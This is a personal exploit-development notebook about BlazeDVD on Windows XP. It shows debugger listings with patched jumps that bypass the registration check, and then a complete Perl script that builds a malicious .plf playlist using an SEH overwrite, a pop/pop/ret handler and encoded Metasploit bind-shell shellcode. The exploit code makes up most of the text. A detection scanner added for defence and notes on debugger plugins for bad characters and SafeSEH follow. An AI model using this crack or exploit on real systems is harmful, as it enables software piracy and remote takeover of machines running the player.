Experimenting with a randomly downloaded version of BlazeDVD.
XP SP3, no DEP.
First, cracking the program:
Very simple: search for the strings and patch a few jmps.
6030324B  . /E9 35030000   jmp Configur.60303585
60303250  > |68 C0003460   push Configur.603400C0   ; IsRegistered1
60303255  . |57            push edi
60303256  . |E8 15570100   call Configur.60318970
6030325B  . |83C4 08       add esp,0x8
6030325E  . |85C0          test eax,eax
60303260    |E9 93000000   jmp Configur.603032F8    //jmp

603033A1  > 68 A87A3460    push Configur.60347AA8   ; IsRegistered3
603033A6  . 57             push edi
603033A7  . E8 C4550100    call Configur.60318970
603033AC  . 83C4 08        add esp,0x8
603033AF  . 85C0           test eax,eax
603033B1    E9 94000000    jmp Configur.6030344A    //jmp
603033B6    90             nop

6030344A  > 68 947A3460    push Configur.60347A94   ; IsPlaybackTimeOut
6030344F  . 57             push edi
60303450  . E8 1B550100    call Configur.60318970
60303455  . 83C4 08        add esp,0x8
60303458  . 85C0           test eax,eax
6030345A    EB 1B          jmp XConfigur.60303477

60303477  > 57             push edi
60303478  . 8D4E E8        lea ecx,dword ptr ds:[esi-0x18]
6030347B  . E8 E0280000    call Configur.60305D60
60303480  . 8BD8           mov ebx,eax
60303482  . 83FB FF        cmp ebx,-0x1
60303485    EB 07          jmp XConfigur.6030348E
60303487  . 33C0           xor eax,eax
60303489  . E9 F7000000    jmp Configur.60303585
6030348E  > 68 E0773460    push Configur.603477E0   ; AutoResumeMode
60303493  . 57             push edi
Perl script:
my $file = "test.plf";
# candidate pop/pop/ret gadgets for the SEH handler
#0x1000ecfa pop ebx; pop ebp; ret
#0x1000ef4a pop esi; pop ebp; ret
#0x1000f00e pop edi; pop esi; ret
#0x100101e7 pop esi; pop ecx; ret
#0x1001028f pop esi; pop ebx; retn 0x0010
#0x100104d7 pop ebx; pop ecx; retn 0x000c
#0x10010511 pop esi; pop ebx; retn 0x000c
#0x1001058a pop ebp; pop ebx; retn 0x0010
#0x10010595 pop ebp; pop ebx; retn 0x0010
#0x1001059f pop ebp; pop ebx; retn 0x0010
#0x100105f1 pop esi; pop ebx; retn 0x000c
my $junk = "\xcc" x 608;                 # filler up to the SEH record
my $nseh = "\xeb\x1e\x90\x90";           # next SEH: short jmp +0x1e over the record into the NOP sled
my $seh  = pack('V', 0x10010511);        # SEH handler: pop esi; pop ebx; retn 0x000c
my $prejunk = "\x90" x 30;               # NOP sled
# windows/shell_bind_tcp - 368 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# LPORT=4444, RHOST=x.x.x.x, EXITFUNC=seh,
#\x1a
# the first 24 bytes are a small XOR decoder stub (key 0x11, stops at 0x90),
# the rest is the encoded payload
my $shellcode =
"\xD9\xEE".
"\xD9\x74\x24\xF4".
"\x58".
"\x83\xC0\x1b".
"\x33\xC9".
"\x8A\x1C\x08".
"\x80\xF3\x11".
"\x88\x1C\x08".
"\x41".
"\x80\xFB\x90".
"\x75\xF1".
"\xed\x79\x7b\x1b\x29\x0f\x79\x72\x98\xc0\x5e\x79\x23\x65\x80\x1d".
"\x9a\xe5\x9c\x6f\xe5\x22\xca\xa6\x15\x3a\xf2\x77\xaa\x22\x23\x42".
"\x79\x64\x62\x74\x63\x45\x22\xc3\x75\x9a\x4b\x21\x9a\x5a\x1d\x9a".
"\x58\x0d\x9a\x18\x9a\x78\x19\xbc\x2c\x7b\x1b\x29\x0f\x64\x14\x84".
"\xee\x46\xe9\x84\x71\x9a\x54\x2d\x9a\x5d\x14\x69\x12\xdc\x9a\x48".
"\x31\x12\xcc\x22\xee\x56\x9a\x25\xaa\x12\xe4\x88\x1e\xaf\x17\x2b".
"\xd5\x65\x19\xd0\xdb\x16\x12\xc1\x57\xfa\xe0\x2a\x45\x35\x0d\x64".
"\xf5\x9a\x48\x35\x12\xcc\x77\x9a\x2d\x6a\x9a\x48\x0d\x12\xcc\x12".
"\x3d\xaa\x84\x4e\xba\x46\x70\x2c\x7b\x1b\x29\x0f\x64\xb8\x22\xca".
"\x42\x79\x75\x70\x21\x32\x79\x32\x41\x70\x7f\x9a\xd5\x42\x41\x41".
"\x42\xee\x46\xed\x42\xee\x46\xe9\x81";
my $payload = $junk.$nseh.$seh.$prejunk.$shellcode;
open(my $FILE, '>', $file) or die "cannot open $file: $!";
binmode($FILE);      # raw bytes, no newline translation on Windows
print $FILE $payload;
close($FILE);
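From the detection side, as an added example that is not part of the original post: a scanner that flags .plf playlists shaped like the file the script above writes (an overlong entry, control bytes in what should be a path, and the junk + nSEH short jmp + handler address + NOP sled layout). The length threshold, the regex, the placeholder handler address and both sample files are assumptions made for this example.

```python
import re

# Tunables and samples below are assumptions for this example, not from the post.
MAX_ENTRY_LEN = 600   # the overflow above needs 608 filler bytes before the SEH frame
# filler run (64+ identical bytes), nSEH short jump (EB xx + 2 pad bytes),
# 4-byte handler address, then a NOP sled: the frame the Perl script builds
SEH_FRAME = re.compile(rb"(.)\1{63,}\xeb.{7}\x90{8,}", re.DOTALL)

def scan_plf(data: bytes) -> list:
    """Return human-readable findings for a BlazeDVD-style .plf playlist.

    A legitimate .plf is a small text file with one media path per line, so
    three things should never appear in one: an overlong entry, control bytes
    other than tab/CR/LF, and the junk + nSEH + SEH + NOP-sled layout above.
    """
    findings = []
    for lineno, line in enumerate(data.split(b"\n"), 1):
        if len(line) > MAX_ENTRY_LEN:
            findings.append(f"line {lineno}: entry of {len(line)} bytes exceeds {MAX_ENTRY_LEN}")
        ctrl = sum(1 for b in line if b < 0x20 and b not in (0x09, 0x0d))
        if ctrl:
            findings.append(f"line {lineno}: {ctrl} control byte(s) in a path entry")
    m = SEH_FRAME.search(data)
    if m:
        findings.append(f"offset {m.start()}: SEH overwrite layout (filler, short jmp, handler, NOP sled)")
    return findings

def is_suspicious(data: bytes) -> bool:
    return bool(scan_plf(data))

# Constructed samples: a normal two-entry playlist, and a file shaped like the
# script's payload with a placeholder handler address and int3 bytes in place of shellcode.
BENIGN_PLF = b"C:\\Videos\\intro.mpg\r\nC:\\Videos\\feature.vob\r\n"
SUSPECT_PLF = (b"A" * 608                      # junk up to the SEH record
               + b"\xeb\x1e\x90\x90"           # nSEH: short jmp over the record
               + b"\xef\xbe\xad\xde"           # SEH handler address (placeholder)
               + b"\x90" * 30                  # NOP sled
               + b"\xcc" * 16)                 # stand-in for the payload

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN_PLF), ("suspect", SUSPECT_PLF)):
        print(name, scan_plf(sample) or ["clean"])
```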
Next, learning how to check for possible bad characters:
!load byakugan
!jutsu memDiff file 302 c:\sploits\shell.txt 0x0012f5de
(arguments: shellcode length, the file containing the shellcode, and its start address in memory)
The bold parts are the differences.
I changed every "\xee" in the shellcode above to "\xcc" and checked as follows:
!load byakugan
!jutsu identBuf file myShell c:\shell.txt
!jutsu identBuf msfpattern myBuffer 608
!jutsu listBuf
!searchcode jmp esp shows the module attributes; needed when looking for specific code under DEP!
!aslrdynamicbase lists the modules with randomized (dynamic) base addresses.
!pvefindaddr j finds jmp/call/ret combinations.
jseh is especially useful when bypassing SafeSEH protection.
nosafeseh lists modules not protected by SafeSEH.
!packets is used to capture wireless packets: open the web page, attach, run !packets, continue execution, then check the Captured Packets window.
!safeseh lists the loaded executable modules and indicates whether each is protected by SafeSEH.
!mona bytearray generates the byte array 00-ff for detecting bad characters.
Finding the shellcode location: !mona cmp -f c:\1egg1.bin